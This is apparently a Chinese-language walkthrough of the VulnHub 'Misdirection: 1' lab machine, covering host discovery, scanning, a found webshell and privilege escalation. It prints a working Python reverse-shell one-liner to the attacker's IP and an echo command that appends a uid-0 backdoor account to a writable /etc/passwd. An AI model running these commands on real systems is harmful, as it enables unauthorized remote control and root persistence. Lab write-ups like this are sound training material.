本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/misdirection-1,371/
这个靶机有点坑,我丢到virtual box里面死活获取不了IP地址,丢到VMware workstations里面是有仅主机模式也是死活获取不了IP地址,只有在VMware workstations环境下配置桥接模式才可以获取IP地址,我这里使用如下方法获取
netdiscover -r 10.0.0.0/8 因为我的桥接网段是10打头的,我刚开始使用10.0.32.0/24掩码确认是发现不了靶机的IP地址,之后只有通过全网段发现,最终发现局域网带VMware 标志,且mac地址符合的主机
目标靶机IP地址为:10.0.32.147
本机kali主机IP地址为:10.0.32.67
nmap扫描结果如下:
正常的使用dirb命令进行爆破目标80端口的目录,但是从显示结果来看是个巨坑,可能是带迷惑性的蜜罐,判断依据是扫除很多敏感目录,但是显示的大小都是50,这明显问题很大,看下面的过程
再看目标80端口是Python写的,越看越觉得像蜜罐,就不浪费时间在这上面,我们尝试扫描目标的8080端口试试
使用nikto扫描和目录爆破都扫出来了一个重要目录debug,我们先访问这个看看,然后再看看shell目录
最终直接获得一个webshell,通过此shell可以执行低权限的命令,将此webshell反弹到kali本地,因为在此webshell中执行不了su,sudo,vim等交互式命令
尝试nc和bash反弹shell不成功,于是使用Python进行反弹shell成功
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.32.67",9933));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
上述反弹成功时候使用sudo -u brexit切换到用户brexit,经过一番搜索,探索,发现/etc/passwd文件针对用户brexit有写的权限,既然这样,那么我们直接加用户,指定uid为0,root家目录,/bin/bash,具体操作如下:
openssl passwd -1 这里输入完成之后会交互式让你输入密码,然后就会生成加密的字符串,最终将其追加至/etc/passwd即可
还有另一种生成密码加密的字符串方式
openssl passwd -1 -salt bmfx bmfx 此命令将直接密码为bmfx的加密字符串,得到上述的加密字符串之后就可以开始追加账户密码到/etc/passwd
echo 'bmfx:$1$lMdMPIIr$A7vPnsv5JKk53goaJov9R.:0:0::/root:/bin/bash' >>/etc/passwd
迷茫的人生,需要不断努力,才能看清远方模糊的志向!